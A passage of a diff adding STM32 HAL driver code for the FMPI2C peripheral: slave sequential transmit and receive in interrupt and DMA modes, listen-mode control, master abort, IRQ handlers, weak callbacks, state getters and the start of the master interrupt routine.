hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_DMA; + + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmatx->XferCpltCallback = FMPI2C_DMASlaveTransmitCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmatx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmatx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)pData, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Reset XferSize */ + hfmpi2c->XferSize = 0; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (FMPI2C_GET_DIR(hfmpi2c) == FMPI2C_DIRECTION_RECEIVE) + { + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the Master */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, STOP, NACK, ADDR interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + + return HAL_OK; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief Sequential receive in slave/device FMPI2C mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Seq_Receive_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) == (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_RX_IT); + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* FMPI2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave TX state to RX state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) + { + /* Disable associated Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_TXDMAEN) == FMPI2C_CR1_TXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + /* Abort DMA Xfer if any */ + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmatx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmatx->XferAbortCallback(hfmpi2c->hdmatx); + } + } + } + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + + if (FMPI2C_GET_DIR(hfmpi2c) == FMPI2C_DIRECTION_TRANSMIT) + { + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the Master */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* REnable ADDR interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT | FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief Sequential receive in slave/device FMPI2C mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Seq_Receive_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) == (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_RX_IT); + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* FMPI2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave TX state to RX state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) + { + /* Disable associated Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_TXDMAEN) == FMPI2C_CR1_TXDMAEN) + { + /* Abort DMA Xfer if any */ + if (hfmpi2c->hdmatx != NULL) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmatx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmatx->XferAbortCallback(hfmpi2c->hdmatx); + } + } + } + } + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX_LISTEN) + { + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_RXDMAEN) == FMPI2C_CR1_RXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + /* Abort DMA Xfer if any */ + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmarx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmarx->XferAbortCallback(hfmpi2c->hdmarx); + } + } + } + } + else + { + /* Nothing to do */ + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_DMA; + + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmarx->XferCpltCallback = FMPI2C_DMASlaveReceiveCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmarx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmarx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, + (uint32_t)pData, hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Reset XferSize */ + hfmpi2c->XferSize = 0; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (FMPI2C_GET_DIR(hfmpi2c) == FMPI2C_DIRECTION_TRANSMIT) + { + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the Master */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* REnable ADDR interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT | FMPI2C_XFER_LISTEN_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + + return HAL_OK; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief Enable the Address listen mode with Interrupt. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_EnableListen_IT(FMPI2C_HandleTypeDef *hfmpi2c) +{ + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + + /* Enable the Address Match interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Disable the Address listen mode with Interrupt. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_DisableListen_IT(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Declaration of tmp to prevent undefined behavior of volatile usage */ + uint32_t tmp; + + /* Disable Address listen mode only if a transfer is not ongoing */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_LISTEN) + { + tmp = (uint32_t)(hfmpi2c->State) & FMPI2C_STATE_MSK; + hfmpi2c->PreviousState = tmp | (uint32_t)(hfmpi2c->Mode); + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + hfmpi2c->XferISR = NULL; + + /* Disable the Address Match interrupt */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort a master FMPI2C IT or DMA process communication with Interrupt. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Abort_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress) +{ + if (hfmpi2c->Mode == HAL_FMPI2C_MODE_MASTER) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Disable Interrupts and Store Previous state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_TX; + } + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_RX; + } + else + { + /* Do nothing */ + } + + /* Set State at HAL_FMPI2C_STATE_ABORT */ + hfmpi2c->State = HAL_FMPI2C_STATE_ABORT; + + /* Set NBYTES to 1 to generate a dummy read on FMPI2C peripheral */ + /* Set AUTOEND mode, this will generate a NACK then STOP condition to abort the current transfer */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, 1, FMPI2C_AUTOEND_MODE, FMPI2C_GENERATE_STOP); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_CPLT_IT); + + return HAL_OK; + } + else + { + /* Wrong usage of abort function */ + /* This function should be used only in case of abort monitored by master device */ + return HAL_ERROR; + } +} + +/** + * @} + */ + +/** @defgroup FMPI2C_IRQ_Handler_and_Callbacks IRQ Handler and Callbacks + * @{ + */ + +/** + * @brief This function handles FMPI2C event interrupt request. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +void HAL_FMPI2C_EV_IRQHandler(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Get current IT Flags and IT sources value */ + uint32_t itflags = READ_REG(hfmpi2c->Instance->ISR); + uint32_t itsources = READ_REG(hfmpi2c->Instance->CR1); + + /* FMPI2C events treatment -------------------------------------*/ + if (hfmpi2c->XferISR != NULL) + { + hfmpi2c->XferISR(hfmpi2c, itflags, itsources); + } +} + +/** + * @brief This function handles FMPI2C error interrupt request. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +void HAL_FMPI2C_ER_IRQHandler(FMPI2C_HandleTypeDef *hfmpi2c) +{ + uint32_t itflags = READ_REG(hfmpi2c->Instance->ISR); + uint32_t itsources = READ_REG(hfmpi2c->Instance->CR1); + uint32_t tmperror; + + /* FMPI2C Bus error interrupt occurred ------------------------------------*/ + if ((FMPI2C_CHECK_FLAG(itflags, FMPI2C_FLAG_BERR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(itsources, FMPI2C_IT_ERRI) != RESET)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_BERR; + + /* Clear BERR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_BERR); + } + + /* FMPI2C Over-Run/Under-Run interrupt occurred ----------------------------------------*/ + if ((FMPI2C_CHECK_FLAG(itflags, FMPI2C_FLAG_OVR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(itsources, FMPI2C_IT_ERRI) != RESET)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_OVR; + + /* Clear OVR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_OVR); + } + + /* FMPI2C Arbitration Loss error interrupt occurred -------------------------------------*/ + if ((FMPI2C_CHECK_FLAG(itflags, FMPI2C_FLAG_ARLO) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(itsources, FMPI2C_IT_ERRI) != RESET)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_ARLO; + + /* Clear ARLO flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ARLO); + } + + /* Store current volatile hfmpi2c->ErrorCode, misra rule */ + tmperror = hfmpi2c->ErrorCode; + + /* Call the Error Callback in case of Error detected */ + if ((tmperror & (HAL_FMPI2C_ERROR_BERR | HAL_FMPI2C_ERROR_OVR | HAL_FMPI2C_ERROR_ARLO)) != HAL_FMPI2C_ERROR_NONE) + { + FMPI2C_ITError(hfmpi2c, tmperror); + } +} + +/** + * @brief Master Tx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MasterTxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MasterTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Master Rx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MasterRxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MasterRxCpltCallback could be implemented in the user file + */ +} + +/** @brief Slave Tx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_SlaveTxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_SlaveTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Slave Rx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_SlaveRxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_SlaveRxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Slave Address Match callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param TransferDirection Master request Transfer Direction (Write/Read), value of @ref FMPI2C_XFERDIRECTION + * @param AddrMatchCode Address Match Code + * @retval None + */ +__weak void HAL_FMPI2C_AddrCallback(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t TransferDirection, uint16_t AddrMatchCode) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + UNUSED(TransferDirection); + UNUSED(AddrMatchCode); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_AddrCallback() could be implemented in the user file + */ +} + +/** + * @brief Listen Complete callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_ListenCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_ListenCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief Memory Tx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MemTxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MemTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Memory Rx Transfer completed callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MemRxCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MemRxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief FMPI2C error callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_ErrorCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief FMPI2C abort callback. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_AbortCpltCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_AbortCpltCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup FMPI2C_Exported_Functions_Group3 Peripheral State, Mode and Error functions + * @brief Peripheral State, Mode and Error functions + * +@verbatim + =============================================================================== + ##### Peripheral State, Mode and Error functions ##### + =============================================================================== + [..] + This subsection permit to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the FMPI2C handle state. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval HAL state + */ +HAL_FMPI2C_StateTypeDef HAL_FMPI2C_GetState(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Return FMPI2C handle state */ + return hfmpi2c->State; +} + +/** + * @brief Returns the FMPI2C Master, Slave, Memory or no mode. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for FMPI2C module + * @retval HAL mode + */ +HAL_FMPI2C_ModeTypeDef HAL_FMPI2C_GetMode(FMPI2C_HandleTypeDef *hfmpi2c) +{ + return hfmpi2c->Mode; +} + +/** + * @brief Return the FMPI2C error code. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval FMPI2C Error Code + */ +uint32_t HAL_FMPI2C_GetError(FMPI2C_HandleTypeDef *hfmpi2c) +{ + return hfmpi2c->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup FMPI2C_Private_Functions + * @{ + */ + +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Master Mode with Interrupt. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param ITFlags Interrupt flags to handle. + * @param ITSources Interrupt sources enabled. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_Master_ISR_IT(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources) +{ + uint16_t devaddress; + uint32_t tmpITFlags = ITFlags; + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_AF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_NACKI) != RESET)) + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Set corresponding Error Code */ + /* No need to generate STOP, it is automatically done */ + /* Error callback will be send during stop flag treatment */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_RXNE) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_RXI) != RESET)) + { + /* Remove RXNE flag on temporary variable as read done */ + tmpITFlags &= ~FMPI2C_FLAG_RXNE; + + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_TXIS) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TXI) != RESET)) + { + /* Write data to TXDR */ + hfmpi2c->Instance->TXDR = *hfmpi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_TCR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TCI) != RESET)) + { + if ((hfmpi2c->XferCount != 0U) && (hfmpi2c->XferSize == 0U)) + { + devaddress = (uint16_t)(hfmpi2c->Instance->CR2 & FMPI2C_CR2_SADD); + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, devaddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + if (hfmpi2c->XferOptions != FMPI2C_NO_OPTION_FRAME) + { + FMPI2C_TransferConfig(hfmpi2c, devaddress, (uint8_t)hfmpi2c->XferSize, + hfmpi2c->XferOptions, FMPI2C_NO_STARTSTOP); + } + else + { + FMPI2C_TransferConfig(hfmpi2c, devaddress, (uint8_t)hfmpi2c->XferSize, + FMPI2C_AUTOEND_MODE, FMPI2C_NO_STARTSTOP); + } + } + } + else + { + /* Call TxCpltCallback() if no stop mode is set */ + if (FMPI2C_GET_STOP_MODE(hfmpi2c) != FMPI2C_AUTOEND_MODE) + { + /* Call FMPI2C Master Sequential complete process */ + FMPI2C_ITMasterSeqCplt(hfmpi2c); + } + else + { + /* Wrong size Status regarding TCR flag event */ + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_SIZE); + } + } + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_TC) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TCI) != RESET)) + { + if (hfmpi2c->XferCount == 0U) + { + if (FMPI2C_GET_STOP_MODE(hfmpi2c) != FMPI2C_AUTOEND_MODE) + { + /* Generate a stop condition in case of no transfer option */ + if (hfmpi2c->XferOptions == FMPI2C_NO_OPTION_FRAME) + { + /* Generate Stop */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_STOP; + } + else + { + /* Call FMPI2C Master Sequential complete process */ + FMPI2C_ITMasterSeqCplt(hfmpi2c); + } + } + } + else + 